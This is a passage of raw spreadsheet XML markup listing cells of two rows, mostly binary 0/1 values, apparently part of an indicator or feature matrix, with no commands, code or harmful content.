        <v>0</v>
      </c>
      <c r="GD19">
        <v>0</v>
      </c>
      <c r="GE19">
        <v>0</v>
      </c>
      <c r="GF19">
        <v>0</v>
      </c>
      <c r="GG19">
        <v>0</v>
      </c>
      <c r="GH19">
        <v>0</v>
      </c>
      <c r="GI19">
        <v>0</v>
      </c>
      <c r="GJ19">
        <v>0</v>
      </c>
      <c r="GK19">
        <v>0</v>
      </c>
      <c r="GL19">
        <v>1</v>
      </c>
      <c r="GM19">
        <v>0</v>
      </c>
      <c r="GN19">
        <v>0</v>
      </c>
      <c r="GO19">
        <v>0</v>
      </c>
      <c r="GP19">
        <v>0</v>
      </c>
      <c r="GQ19">
        <v>0</v>
      </c>
      <c r="GR19">
        <v>0</v>
      </c>
      <c r="GS19">
        <v>0</v>
      </c>
      <c r="GT19">
        <v>0</v>
      </c>
      <c r="GU19">
        <v>0</v>
      </c>
      <c r="GV19">
        <v>0</v>
      </c>
      <c r="GW19">
        <v>0</v>
      </c>
      <c r="GX19">
        <v>0</v>
      </c>
      <c r="GY19">
        <v>0</v>
      </c>
      <c r="GZ19">
        <v>0</v>
      </c>
      <c r="HA19">
        <v>0</v>
      </c>
      <c r="HB19">
        <v>0</v>
      </c>
      <c r="HC19">
        <v>0</v>
      </c>
      <c r="HD19">
        <v>0</v>
      </c>
      <c r="HE19">
        <v>0</v>
      </c>
      <c r="HF19">
        <v>0</v>
      </c>
      <c r="HG19">
        <v>1</v>
      </c>
      <c r="HH19">
        <v>0</v>
      </c>
      <c r="HI19">
        <v>0</v>
      </c>
      <c r="HJ19">
        <v>0</v>
      </c>
      <c r="HK19">
        <v>0</v>
      </c>
      <c r="HL19">
        <v>0</v>
      </c>
      <c r="HM19">
        <v>0</v>
      </c>
      <c r="HN19">
        <v>0</v>
      </c>
      <c r="HO19">
        <v>0</v>
      </c>
      <c r="HP19">
        <v>0</v>
      </c>
      <c r="HQ19">
        <v>0</v>
      </c>
      <c r="HR19">
        <v>0</v>
      </c>
      <c r="HS19">
        <v>0</v>
      </c>
      <c r="HT19">
        <v>0</v>
      </c>
      <c r="HU19">
        <v>0</v>
      </c>
      <c r="HV19">
        <v>0</v>
      </c>
      <c r="HW19">
        <v>0</v>
      </c>
      <c r="HX19">
        <v>0</v>
      </c>
      <c r="HY19">
        <v>0</v>
      </c>
      <c r="HZ19">
        <v>0</v>
      </c>
      <c r="IA19">
        <v>0</v>
      </c>
      <c r="IB19">
        <v>0</v>
      </c>
      <c r="IC19">
        <v>0</v>
      </c>
      <c r="ID19">
        <v>0</v>
      </c>
      <c r="IE19">
        <v>0</v>
      </c>
      <c r="IF19">
        <v>0</v>
      </c>
      <c r="IG19">
        <v>0</v>
      </c>
      <c r="IH19">
        <v>0</v>
      </c>
      <c r="II19">
        <v>0</v>
      </c>
      <c r="IJ19">
        <v>0</v>
      </c>
      <c r="IK19">
        <v>0</v>
      </c>
      <c r="IL19">
        <v>0</v>
      </c>
      <c r="IM19">
        <v>0</v>
      </c>
      <c r="IN19">
        <v>0</v>
      </c>
      <c r="IO19">
        <v>0</v>
      </c>
      <c r="IP19">
        <v>0</v>
      </c>
      <c r="IQ19">
        <v>0</v>
      </c>
      <c r="IR19">
        <v>0</v>
      </c>
      <c r="IS19">
        <v>0</v>
      </c>
      <c r="IT19">
        <v>0</v>
      </c>
      <c r="IU19">
        <v>0</v>
      </c>
      <c r="IV19">
        <v>0</v>
      </c>
      <c r="IW19">
        <v>0</v>
      </c>
      <c r="IX19">
        <v>0</v>
      </c>
      <c r="IY19">
        <v>0</v>
      </c>
      <c r="IZ19">
        <v>1</v>
      </c>
      <c r="JA19">
        <v>0</v>
      </c>
      <c r="JB19">
        <v>0</v>
      </c>
      <c r="JC19">
        <v>0</v>
      </c>
      <c r="JD19">
        <v>0</v>
      </c>
      <c r="JE19">
        <v>0</v>
      </c>
      <c r="JF19">
        <v>0</v>
      </c>
      <c r="JG19">
        <v>0</v>
      </c>
      <c r="JH19">
        <v>0</v>
      </c>
      <c r="JI19">
        <v>0</v>
      </c>
      <c r="JJ19">
        <v>1</v>
      </c>
      <c r="JK19">
        <v>0</v>
      </c>
      <c r="JL19">
        <v>0</v>
      </c>
      <c r="JM19">
        <v>0</v>
      </c>
      <c r="JN19">
        <v>0</v>
      </c>
      <c r="JO19">
        <v>0</v>
      </c>
      <c r="JP19">
        <v>0</v>
      </c>
      <c r="JQ19">
        <v>0</v>
      </c>
      <c r="JR19">
        <v>0</v>
      </c>
      <c r="JS19">
        <v>0</v>
      </c>
      <c r="JT19">
        <v>0</v>
      </c>
      <c r="JU19">
        <v>0</v>
      </c>
      <c r="JV19">
        <v>0</v>
      </c>
      <c r="JW19">
        <v>0</v>
      </c>
      <c r="JX19">
        <v>0</v>
      </c>
      <c r="JY19">
        <v>0</v>
      </c>
      <c r="JZ19">
        <v>0</v>
      </c>
      <c r="KA19">
        <v>0</v>
      </c>
      <c r="KB19">
        <v>0</v>
      </c>
      <c r="KC19">
        <v>0</v>
      </c>
      <c r="KD19">
        <v>0</v>
      </c>
      <c r="KE19">
        <v>0</v>
      </c>
      <c r="KF19">
        <v>0</v>
      </c>
      <c r="KG19">
        <v>0</v>
      </c>
      <c r="KH19">
        <v>0</v>
      </c>
      <c r="KI19">
        <v>0</v>
      </c>
      <c r="KJ19">
        <v>0</v>
      </c>
      <c r="KK19">
        <v>0</v>
      </c>
      <c r="KL19">
        <v>0</v>
      </c>
      <c r="KM19">
        <v>0</v>
      </c>
      <c r="KN19">
        <v>0</v>
      </c>
      <c r="KO19">
        <v>0</v>
      </c>
      <c r="KP19">
        <v>0</v>
      </c>
      <c r="KQ19">
        <v>0</v>
      </c>
      <c r="KR19">
        <v>0</v>
      </c>
      <c r="KS19">
        <v>0</v>
      </c>
      <c r="KT19">
        <v>0</v>
      </c>
      <c r="KU19">
        <v>0</v>
      </c>
      <c r="KV19">
        <v>0</v>
      </c>
      <c r="KW19">
        <v>0</v>
      </c>
      <c r="KX19">
        <v>0</v>
      </c>
      <c r="KY19">
        <v>0</v>
      </c>
      <c r="KZ19">
        <v>0</v>
      </c>
      <c r="LA19">
        <v>0</v>
      </c>
      <c r="LB19">
        <v>0</v>
      </c>
      <c r="LC19">
        <v>0</v>
      </c>
      <c r="LD19">
        <v>0</v>
      </c>
      <c r="LE19">
        <v>0</v>
      </c>
      <c r="LF19">
        <v>0</v>
      </c>
      <c r="LG19">
        <v>0</v>
      </c>
      <c r="LH19">
        <v>0</v>
      </c>
      <c r="LI19">
        <v>0</v>
      </c>
      <c r="LJ19">
        <v>0</v>
      </c>
      <c r="LK19">
        <v>0</v>
      </c>
      <c r="LL19">
        <v>0</v>
      </c>
      <c r="LM19">
        <v>0</v>
      </c>
      <c r="LN19">
        <v>0</v>
      </c>
      <c r="LO19">
        <v>0</v>
      </c>
      <c r="LP19">
        <v>1</v>
      </c>
      <c r="LQ19">
        <v>0</v>
      </c>
      <c r="LR19">
        <v>0</v>
      </c>
      <c r="LS19">
        <v>0</v>
      </c>
      <c r="LT19">
        <v>0</v>
      </c>
      <c r="LU19">
        <v>0</v>
      </c>
      <c r="LV19">
        <v>0</v>
      </c>
      <c r="LW19">
        <v>0</v>
      </c>
      <c r="LX19">
        <v>0</v>
      </c>
      <c r="LY19">
        <v>0</v>
      </c>
      <c r="LZ19">
        <v>0</v>
      </c>
      <c r="MA19">
        <v>0</v>
      </c>
      <c r="MB19">
        <v>0</v>
      </c>
      <c r="MC19">
        <v>0</v>
      </c>
      <c r="MD19">
        <v>0</v>
      </c>
      <c r="ME19">
        <v>0</v>
      </c>
      <c r="MF19">
        <v>0</v>
      </c>
      <c r="MG19">
        <v>0</v>
      </c>
      <c r="MH19">
        <v>0</v>
      </c>
      <c r="MI19">
        <v>0</v>
      </c>
      <c r="MJ19">
        <v>0</v>
      </c>
      <c r="MK19">
        <v>0</v>
      </c>
      <c r="ML19">
        <v>1</v>
      </c>
      <c r="MM19">
        <v>0</v>
      </c>
      <c r="MN19">
        <v>0</v>
      </c>
      <c r="MO19">
        <v>0</v>
      </c>
      <c r="MP19">
        <v>0</v>
      </c>
      <c r="MQ19">
        <v>0</v>
      </c>
      <c r="MR19">
        <v>0</v>
      </c>
      <c r="MS19">
        <v>0</v>
      </c>
      <c r="MT19">
        <v>0</v>
      </c>
      <c r="MU19">
        <v>0</v>
      </c>
      <c r="MV19">
        <v>0</v>
      </c>
      <c r="MW19">
        <v>0</v>
      </c>
      <c r="MX19">
        <v>0</v>
      </c>
      <c r="MY19">
        <v>0</v>
      </c>
      <c r="MZ19">
        <v>0</v>
      </c>
      <c r="NA19">
        <v>0</v>
      </c>
      <c r="NB19">
        <v>0</v>
      </c>
      <c r="NC19">
        <v>0</v>
      </c>
      <c r="ND19">
        <v>0</v>
      </c>
      <c r="NE19">
        <v>0</v>
      </c>
      <c r="NF19">
        <v>0</v>
      </c>
      <c r="NG19">
        <v>0</v>
      </c>
      <c r="NH19">
        <v>0</v>
      </c>
      <c r="NI19">
        <v>0</v>
      </c>
      <c r="NJ19">
        <v>0</v>
      </c>
      <c r="NK19">
        <v>0</v>
      </c>
      <c r="NL19">
        <v>0</v>
      </c>
      <c r="NM19">
        <v>0</v>
      </c>
      <c r="NN19">
        <v>0</v>
      </c>
      <c r="NO19">
        <v>0</v>
      </c>
      <c r="NP19">
        <v>0</v>
      </c>
      <c r="NQ19">
        <v>0</v>
      </c>
      <c r="NR19">
        <v>0</v>
      </c>
      <c r="NS19">
        <v>0</v>
      </c>
      <c r="NT19">
        <v>0</v>
      </c>
      <c r="NU19">
        <v>0</v>
      </c>
      <c r="NV19">
        <v>0</v>
      </c>
      <c r="NW19">
        <v>0</v>
      </c>
      <c r="NX19">
        <v>0</v>
      </c>
      <c r="NY19">
        <v>0</v>
      </c>
      <c r="NZ19">
        <v>0</v>
      </c>
      <c r="OA19">
        <v>0</v>
      </c>
      <c r="OB19">
        <v>0</v>
      </c>
      <c r="OC19">
        <v>0</v>
      </c>
      <c r="OD19">
        <v>0</v>
      </c>
      <c r="OE19">
        <v>0</v>
      </c>
      <c r="OF19">
        <v>0</v>
      </c>
      <c r="OG19">
        <v>0</v>
      </c>
      <c r="OH19">
        <v>0</v>
      </c>
      <c r="OI19">
        <v>0</v>
      </c>
      <c r="OJ19">
        <v>0</v>
      </c>
      <c r="OK19">
        <v>0</v>
      </c>
      <c r="OL19">
        <v>0</v>
      </c>
      <c r="OM19">
        <v>0</v>
      </c>
      <c r="ON19">
        <v>0</v>
      </c>
      <c r="OO19">
        <v>0</v>
      </c>
      <c r="OP19">
        <v>0</v>
      </c>
      <c r="OQ19">
        <v>0</v>
      </c>
      <c r="OR19">
        <v>0</v>
      </c>
      <c r="OS19">
        <v>0</v>
      </c>
      <c r="OT19">
        <v>0</v>
      </c>
      <c r="OU19">
        <v>0</v>
      </c>
      <c r="OV19">
        <v>0</v>
      </c>
      <c r="OW19">
        <v>0</v>
      </c>
      <c r="OX19">
        <v>0</v>
      </c>
      <c r="OY19">
        <v>0</v>
      </c>
      <c r="OZ19">
        <v>0</v>
      </c>
      <c r="PA19">
        <v>0</v>
      </c>
      <c r="PB19">
        <v>0</v>
      </c>
      <c r="PC19">
        <v>0</v>
      </c>
      <c r="PD19">
        <v>0</v>
      </c>
      <c r="PE19">
        <v>0</v>
      </c>
      <c r="PF19">
        <v>0</v>
      </c>
      <c r="PG19">
        <v>0</v>
      </c>
      <c r="PH19">
        <v>0</v>
      </c>
      <c r="PI19">
        <v>0</v>
      </c>
      <c r="PJ19">
        <v>0</v>
      </c>
      <c r="PK19">
        <v>0</v>
      </c>
      <c r="PL19">
        <v>0</v>
      </c>
      <c r="PM19">
        <v>0</v>
      </c>
      <c r="PN19">
        <v>0</v>
      </c>
      <c r="PO19">
        <v>0</v>
      </c>
      <c r="PP19">
        <v>0</v>
      </c>
      <c r="PQ19">
        <v>0</v>
      </c>
      <c r="PR19">
        <v>0</v>
      </c>
      <c r="PS19">
        <v>0</v>
      </c>
      <c r="PT19">
        <v>0</v>
      </c>
      <c r="PU19">
        <v>0</v>
      </c>
      <c r="PV19">
        <v>0</v>
      </c>
      <c r="PW19">
        <v>0</v>
      </c>
      <c r="PX19">
        <v>0</v>
      </c>
      <c r="PY19">
        <v>0</v>
      </c>
      <c r="PZ19">
        <v>0</v>
      </c>
      <c r="QA19">
        <v>0</v>
      </c>
      <c r="QB19">
        <v>0</v>
      </c>
      <c r="QC19">
        <v>0</v>
      </c>
      <c r="QD19">
        <v>0</v>
      </c>
      <c r="QE19">
        <v>0</v>
      </c>
      <c r="QF19">
        <v>0</v>
      </c>
      <c r="QG19">
        <v>0</v>
      </c>
      <c r="QH19">
        <v>0</v>
      </c>
      <c r="QI19">
        <v>0</v>
      </c>
      <c r="QJ19">
        <v>0</v>
      </c>
      <c r="QK19">
        <v>0</v>
      </c>
      <c r="QL19">
        <v>0</v>
      </c>
      <c r="QM19">
        <v>0</v>
      </c>
      <c r="QN19">
        <v>0</v>
      </c>
      <c r="QO19">
        <v>0</v>
      </c>
      <c r="QP19">
        <v>0</v>
      </c>
      <c r="QQ19">
        <v>0</v>
      </c>
      <c r="QR19">
        <v>0</v>
      </c>
      <c r="QS19">
        <v>1</v>
      </c>
      <c r="QT19">
        <v>0</v>
      </c>
      <c r="QU19">
        <v>0</v>
      </c>
      <c r="QV19">
        <v>0</v>
      </c>
      <c r="QW19">
        <v>0</v>
      </c>
      <c r="QX19">
        <v>0</v>
      </c>
      <c r="QY19">
        <v>0</v>
      </c>
      <c r="QZ19">
        <v>0</v>
      </c>
      <c r="RA19">
        <v>0</v>
      </c>
      <c r="RB19">
        <v>0</v>
      </c>
      <c r="RC19">
        <v>0</v>
      </c>
      <c r="RD19">
        <v>0</v>
      </c>
      <c r="RE19">
        <v>0</v>
      </c>
      <c r="RF19">
        <v>0</v>
      </c>
      <c r="RG19">
        <v>0</v>
      </c>
      <c r="RH19">
        <v>0</v>
      </c>
      <c r="RI19">
        <v>0</v>
      </c>
      <c r="RJ19">
        <v>0</v>
      </c>
      <c r="RK19">
        <v>0</v>
      </c>
      <c r="RL19">
        <v>0</v>
      </c>
      <c r="RM19">
        <v>0</v>
      </c>
      <c r="RN19">
        <v>0</v>
      </c>
      <c r="RO19">
        <v>0</v>
      </c>
      <c r="RP19">
        <v>0</v>
      </c>
      <c r="RQ19">
        <v>0</v>
      </c>
      <c r="RR19">
        <v>0</v>
      </c>
      <c r="RS19">
        <v>0</v>
      </c>
      <c r="RT19">
        <v>0</v>
      </c>
      <c r="RU19">
        <v>0</v>
      </c>
      <c r="RV19">
        <v>0</v>
      </c>
      <c r="RW19">
        <v>0</v>
      </c>
      <c r="RX19">
        <v>0</v>
      </c>
      <c r="RY19">
        <v>0</v>
      </c>
      <c r="RZ19">
        <v>0</v>
      </c>
      <c r="SA19">
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A20" s="6" t="s">
        <v>2654</v>
      </c>
      <c r="B20">
        <v>194</v>
      </c>
      <c r="C20">
        <v>1</v>
      </c>
      <c r="D20">
        <v>1</v>
      </c>
      <c r="E20">
        <v>1</v>
      </c>
      <c r="F20">
        <v>1</v>
      </c>
      <c r="G20">
        <v>0</v>
      </c>
      <c r="H20">
        <v>0</v>
      </c>
      <c r="I20">
        <v>1</v>
      </c>
      <c r="J20">
        <v>0</v>
      </c>
      <c r="K20">
        <v>1</v>
      </c>
      <c r="L20">
        <v>1</v>
      </c>
      <c r="M20">
        <v>1</v>
      </c>
      <c r="N20">
        <v>0</v>
      </c>
      <c r="O20">
        <v>0</v>
      </c>
      <c r="P20">
        <v>0</v>
      </c>
      <c r="Q20">
        <v>0</v>
      </c>
      <c r="R20">
        <v>0</v>
      </c>
      <c r="S20">
        <v>1</v>
      </c>
      <c r="T20">
        <v>0</v>
      </c>
      <c r="U20">
        <v>1</v>
      </c>
      <c r="V20">
        <v>0</v>
      </c>
      <c r="W20">
        <v>1</v>
      </c>
      <c r="X20">
        <v>1</v>
      </c>
      <c r="Y20">
        <v>1</v>
      </c>
      <c r="Z20">
        <v>0</v>
      </c>
      <c r="AA20">
        <v>0</v>
      </c>
      <c r="AB20">
        <v>0</v>
      </c>
      <c r="AC20">
        <v>1</v>
      </c>
      <c r="AD20">
        <v>0</v>
      </c>
      <c r="AE20">
        <v>0</v>
      </c>
      <c r="AF20">
        <v>0</v>
      </c>
      <c r="AG20">
        <v>0</v>
      </c>
      <c r="AH20">
        <v>1</v>
      </c>
      <c r="AI20">
        <v>0</v>
      </c>
      <c r="AJ20">
        <v>1</v>
      </c>
      <c r="AK20">
        <v>0</v>
      </c>
      <c r="AL20">
        <v>1</v>
      </c>
      <c r="AM20">
        <v>0</v>
      </c>
      <c r="AN20">
        <v>1</v>
      </c>
      <c r="AO20">
        <v>1</v>
      </c>
      <c r="AP20">
        <v>0</v>
      </c>
      <c r="AQ20">
        <v>1</v>
      </c>
      <c r="AR20">
        <v>0</v>
      </c>
      <c r="AS20">
        <v>1</v>
      </c>
      <c r="AT20">
        <v>1</v>
      </c>
      <c r="AU20">
        <v>0</v>
      </c>
      <c r="AV20">
        <v>0</v>
      </c>
      <c r="AW20">
        <v>0</v>
      </c>
      <c r="AX20">
        <v>0</v>
      </c>
      <c r="AY20">
        <v>1</v>
      </c>
      <c r="AZ20">
        <v>0</v>
      </c>
      <c r="BA20">
        <v>0</v>
      </c>
      <c r="BB20">
        <v>0</v>
      </c>
      <c r="BC20">
        <v>0</v>
      </c>
      <c r="BD20">
        <v>1</v>
      </c>
      <c r="BE20">
        <v>0</v>
      </c>
      <c r="BF20">
        <v>1</v>
      </c>
      <c r="BG20">
        <v>1</v>
      </c>
      <c r="BH20">
        <v>0</v>
      </c>
      <c r="BI20">
        <v>0</v>
      </c>
      <c r="BJ20">
        <v>0</v>
      </c>
      <c r="BK20">
        <v>0</v>
      </c>
      <c r="BL20">
        <v>0</v>
      </c>
      <c r="BM20">
        <v>1</v>
      </c>
      <c r="BN20">
        <v>1</v>
      </c>
      <c r="BO20">
        <v>1</v>
      </c>
      <c r="BP20">
        <v>1</v>
      </c>
      <c r="BQ20">
        <v>0</v>
      </c>
      <c r="BR20">
        <v>0</v>
      </c>
      <c r="BS20">
        <v>1</v>
      </c>
      <c r="BT20">
        <v>0</v>
      </c>
      <c r="BU20">
        <v>0</v>
      </c>
      <c r="BV20">
        <v>1</v>
      </c>
      <c r="BW20">
        <v>1</v>
      </c>
      <c r="BX20">
        <v>1</v>
      </c>
      <c r="BY20">
        <v>0</v>
      </c>
      <c r="BZ20">
        <v>0</v>
      </c>
      <c r="CA20">
        <v>1</v>
      </c>
      <c r="CB20">
        <v>1</v>
      </c>
      <c r="CC20">
        <v>0</v>
      </c>
      <c r="CD20">
        <v>0</v>
      </c>
      <c r="CE20">
        <v>0</v>
      </c>
      <c r="CF20">
        <v>1</v>
      </c>
      <c r="CG20">
        <v>1</v>
      </c>
      <c r="CH20">
        <v>0</v>
      </c>
      <c r="CI20">
        <v>0</v>
      </c>
      <c r="CJ20">
        <v>0</v>
      </c>
      <c r="CK20">
        <v>1</v>
      </c>
      <c r="CL20">
        <v>0</v>
      </c>
      <c r="CM20">
        <v>0</v>
      </c>
      <c r="CN20">
        <v>0</v>
      </c>
      <c r="CO20">
        <v>1</v>
      </c>
      <c r="CP20">
        <v>1</v>
      </c>
      <c r="CQ20">
        <v>1</v>
      </c>
      <c r="CR20">
        <v>1</v>
      </c>
      <c r="CS20">
        <v>0</v>
      </c>
      <c r="CT20">
        <v>0</v>
      </c>
      <c r="CU20">
        <v>1</v>
      </c>
      <c r="CV20">
        <v>0</v>
      </c>
      <c r="CW20">
        <v>1</v>
      </c>
      <c r="CX20">
        <v>1</v>
      </c>
      <c r="CY20">
        <v>0</v>
      </c>
      <c r="CZ20">
        <v>1</v>
      </c>
      <c r="DA20">
        <v>0</v>
      </c>
      <c r="DB20">
        <v>1</v>
      </c>
      <c r="DC20">
        <v>0</v>
      </c>
      <c r="DD20">
        <v>0</v>
      </c>
      <c r="DE20">
        <v>1</v>
      </c>
      <c r="DF20">
        <v>1</v>
      </c>
      <c r="DG20">
        <v>0</v>
      </c>
      <c r="DH20">
        <v>1</v>
      </c>
      <c r="DI20">
        <v>0</v>
      </c>
      <c r="DJ20">
        <v>0</v>
      </c>
      <c r="DK20">
        <v>1</v>
      </c>
      <c r="DL20">
        <v>1</v>
      </c>
      <c r="DM20">
        <v>1</v>
      </c>
      <c r="DN20">
        <v>0</v>
      </c>
      <c r="DO20">
        <v>1</v>
      </c>
      <c r="DP20">
        <v>1</v>
      </c>
      <c r="DQ20">
        <v>1</v>
      </c>
      <c r="DR20">
        <v>0</v>
      </c>
      <c r="DS20">
        <v>1</v>
      </c>
      <c r="DT20">
        <v>0</v>
      </c>
      <c r="DU20">
        <v>0</v>
      </c>
      <c r="DV20">
        <v>1</v>
      </c>
      <c r="DW20">
        <v>0</v>
      </c>
      <c r="DX20">
        <v>1</v>
      </c>
      <c r="DY20">
        <v>0</v>
      </c>
      <c r="DZ20">
        <v>0</v>
      </c>
      <c r="EA20">
        <v>0</v>
      </c>
      <c r="EB20">
        <v>0</v>
      </c>
      <c r="EC20">
        <v>1</v>
      </c>
      <c r="ED20">
        <v>1</v>
      </c>
      <c r="EE20">
        <v>0</v>
      </c>
      <c r="EF20">
        <v>0</v>
      </c>
      <c r="EG20">
        <v>1</v>
      </c>
      <c r="EH20">
        <v>0</v>
      </c>
      <c r="EI20">
        <v>1</v>
      </c>
      <c r="EJ20">
        <v>0</v>
      </c>
      <c r="EK20">
        <v>0</v>
      </c>
      <c r="EL20">
        <v>0</v>
      </c>
      <c r="EM20">
        <v>0</v>
      </c>
      <c r="EN20">
        <v>0</v>
      </c>
      <c r="EO20">
        <v>0</v>
      </c>
      <c r="EP20">
        <v>0</v>
      </c>
      <c r="EQ20">
        <v>1</v>
      </c>
      <c r="ER20">
        <v>1</v>
      </c>
      <c r="ES20">
        <v>1</v>
      </c>
      <c r="ET20">
        <v>1</v>
      </c>
      <c r="EU20">
        <v>1</v>
      </c>
      <c r="EV20">
        <v>1</v>
      </c>
      <c r="EW20">
        <v>1</v>
      </c>
      <c r="EX20">
        <v>1</v>
      </c>
      <c r="EY20">
        <v>1</v>
      </c>
      <c r="EZ20">
        <v>1</v>
      </c>
      <c r="FA20">
        <v>1</v>
      </c>
      <c r="FB20">
        <v>1</v>
      </c>
      <c r="FC20">
        <v>0</v>
      </c>
      <c r="FD20">
        <v>0</v>
      </c>
      <c r="FE20">
        <v>1</v>
      </c>
      <c r="FF20">
        <v>0</v>
      </c>
      <c r="FG20">
        <v>0</v>
      </c>
      <c r="FH20">
        <v>1</v>
      </c>
      <c r="FI20">
        <v>0</v>
      </c>
      <c r="FJ20">
        <v>0</v>
      </c>
      <c r="FK20">
        <v>0</v>
      </c>
      <c r="FL20">
        <v>0</v>
      </c>
      <c r="FM20">
        <v>0</v>
      </c>
      <c r="FN20">
        <v>1</v>
      </c>
      <c r="FO20">
        <v>0</v>
      </c>
      <c r="FP20">
        <v>0</v>
      </c>
      <c r="FQ20">
        <v>0</v>
      </c>
      <c r="FR20">
        <v>1</v>
      </c>
      <c r="FS20">
        <v>1</v>
      </c>
      <c r="FT20">
        <v>0</v>
      </c>
      <c r="FU20">
        <v>1</v>
      </c>
      <c r="FV20">
        <v>0</v>
      </c>
      <c r="FW20">
        <v>0</v>
      </c>
      <c r="FX20">
        <v>0</v>
      </c>
      <c r="FY20">
        <v>1</v>
      </c>
      <c r="FZ20">
        <v>0</v>
      </c>
      <c r="GA20">
        <v>0</v>
      </c>
      <c r="GB20">
        <v>1</v>
      </c>
      <c r="GC20">
        <v>0</v>
      </c>
      <c r="GD20">
        <v>0</v>
      </c>
      <c r="GE20">
        <v>0</v>
      </c>
      <c r="GF20">
        <v>1</v>
      </c>
      <c r="GG20">
        <v>0</v>
      </c>
      <c r="GH20">
        <v>0</v>
      </c>
      <c r="GI20">
        <v>1</v>
      </c>
      <c r="GJ20">
        <v>0</v>
      </c>
      <c r="GK20">
        <v>1</v>
      </c>
      <c r="GL20">
        <v>0</v>
      </c>
      <c r="GM20">
        <v>0</v>
      </c>
      <c r="GN20">
        <v>0</v>
      </c>
      <c r="GO20">
        <v>0</v>
      </c>
      <c r="GP20">
        <v>0</v>
      </c>
      <c r="GQ20">
        <v>1</v>
      </c>
      <c r="GR20">
        <v>0</v>
      </c>
      <c r="GS20">
        <v>1</v>
      </c>
      <c r="GT20">
        <v>0</v>
      </c>
      <c r="GU20">
        <v>1</v>
      </c>
      <c r="GV20">
        <v>0</v>
      </c>
      <c r="GW20">
        <v>0</v>
      </c>
      <c r="GX20">
        <v>0</v>
      </c>
      <c r="GY20">
        <v>1</v>
      </c>
      <c r="GZ20">
        <v>1</v>
      </c>
      <c r="HA20">
        <v>0</v>
      </c>
      <c r="HB20">
        <v>0</v>
      </c>
      <c r="HC20">
        <v>1</v>
      </c>
      <c r="HD20">
        <v>0</v>
      </c>
      <c r="HE20">
        <v>1</v>
      </c>
      <c r="HF20">
        <v>0</v>
      </c>
      <c r="HG20">
        <v>0</v>
      </c>
      <c r="HH20">
        <v>0</v>
      </c>
      <c r="HI20">
        <v>0</v>
      </c>
      <c r="HJ20">
        <v>0</v>
      </c>
      <c r="HK20">
        <v>0</v>
      </c>
      <c r="HL20">
        <v>1</v>
      </c>
      <c r="HM20">
        <v>1</v>
      </c>
      <c r="HN20">
        <v>0</v>
      </c>
      <c r="HO20">
        <v>0</v>
      </c>
      <c r="HP20">
        <v>0</v>
      </c>
      <c r="HQ20">
        <v>0</v>
      </c>
      <c r="HR20">
        <v>1</v>
      </c>
      <c r="HS20">
        <v>0</v>
      </c>
      <c r="HT20">
        <v>0</v>
      </c>
      <c r="HU20">
        <v>1</v>
      </c>
      <c r="HV20">
        <v>1</v>
      </c>
      <c r="HW20">
        <v>0</v>
      </c>
      <c r="HX20">
        <v>0</v>
      </c>
      <c r="HY20">
        <v>1</v>
      </c>
      <c r="HZ20">
        <v>1</v>
      </c>
      <c r="IA20">
        <v>0</v>
      </c>
      <c r="IB20">
        <v>0</v>
      </c>
      <c r="IC20">
        <v>1</v>
      </c>
      <c r="ID20">
        <v>1</v>
      </c>
      <c r="IE20">
        <v>0</v>
      </c>
      <c r="IF20">
        <v>0</v>
      </c>
      <c r="IG20">
        <v>0</v>
      </c>
      <c r="IH20">
        <v>1</v>
      </c>
      <c r="II20">
        <v>0</v>
      </c>
      <c r="IJ20">
        <v>1</v>
      </c>
      <c r="IK20">
        <v>0</v>
      </c>
      <c r="IL20">
        <v>0</v>
      </c>
      <c r="IM20">
        <v>0</v>
      </c>
      <c r="IN20">
        <v>0</v>
      </c>
      <c r="IO20">
        <v>0</v>
      </c>
      <c r="IP20">
        <v>1</v>
      </c>
      <c r="IQ20">
        <v>0</v>
      </c>
      <c r="IR20">
        <v>0</v>
      </c>
      <c r="IS20">
        <v>0</v>
      </c>
      <c r="IT20">
        <v>1</v>
      </c>
      <c r="IU20">
        <v>1</v>
      </c>
      <c r="IV20">
        <v>1</v>
      </c>
      <c r="IW20">
        <v>0</v>
      </c>
      <c r="IX20">
        <v>0</v>
      </c>
      <c r="IY20">
        <v>0</v>
      </c>
      <c r="IZ20">
        <v>0</v>
      </c>
      <c r="JA20">
        <v>0</v>
      </c>
      <c r="JB20">
        <v>0</v>
      </c>
      <c r="JC20">
        <v>0</v>
      </c>
      <c r="JD20">
        <v>0</v>
      </c>
      <c r="JE20">
        <v>0</v>
      </c>
      <c r="JF20">
        <v>0</v>
      </c>
      <c r="JG20">
        <v>0</v>
      </c>
      <c r="JH20">
        <v>0</v>
      </c>
      <c r="JI20">
        <v>0</v>
      </c>
      <c r="JJ20">
        <v>1</v>
      </c>
      <c r="JK20">
        <v>0</v>
      </c>
      <c r="JL20">
        <v>0</v>
      </c>
      <c r="JM20">
        <v>1</v>
      </c>
      <c r="JN20">
        <v>0</v>
      </c>
      <c r="JO20">
        <v>1</v>
      </c>
      <c r="JP20">
        <v>1</v>
      </c>
      <c r="JQ20">
        <v>0</v>
      </c>
      <c r="JR20">
        <v>1</v>
      </c>
      <c r="JS20">
        <v>1</v>
      </c>
      <c r="JT20">
        <v>0</v>
      </c>
      <c r="JU20">
        <v>1</v>
      </c>
      <c r="JV20">
        <v>1</v>
      </c>
      <c r="JW20">
        <v>1</v>
      </c>
      <c r="JX20">
        <v>0</v>
      </c>
      <c r="JY20">
        <v>0</v>
      </c>
      <c r="JZ20">
        <v>0</v>
      </c>
      <c r="KA20">
        <v>1</v>
      </c>
      <c r="KB20">
        <v>0</v>
      </c>
      <c r="KC20">
        <v>0</v>
      </c>
      <c r="KD20">
        <v>0</v>
      </c>
      <c r="KE20">
        <v>0</v>
      </c>
      <c r="KF20">
        <v>1</v>
      </c>
      <c r="KG20">
        <v>1</v>
      </c>
      <c r="KH20">
        <v>1</v>
      </c>
      <c r="KI20">
        <v>0</v>
      </c>
      <c r="KJ20">
        <v>0</v>
      </c>
      <c r="KK20">
        <v>0</v>
      </c>
      <c r="KL20">
        <v>0</v>
      </c>
      <c r="KM20">
        <v>0</v>
      </c>
      <c r="KN20">
        <v>0</v>
      </c>
      <c r="KO20">
        <v>1</v>
      </c>
      <c r="KP20">
        <v>0</v>
      </c>
      <c r="KQ20">
        <v>0</v>
      </c>
      <c r="KR20">
        <v>0</v>
      </c>
      <c r="KS20">
        <v>1</v>
      </c>
      <c r="KT20">
        <v>1</v>
      </c>
      <c r="KU20">
        <v>0</v>
      </c>
      <c r="KV20">
        <v>1</v>
      </c>
      <c r="KW20">
        <v>1</v>
      </c>
      <c r="KX20">
        <v>1</v>
      </c>
      <c r="KY20">
        <v>0</v>
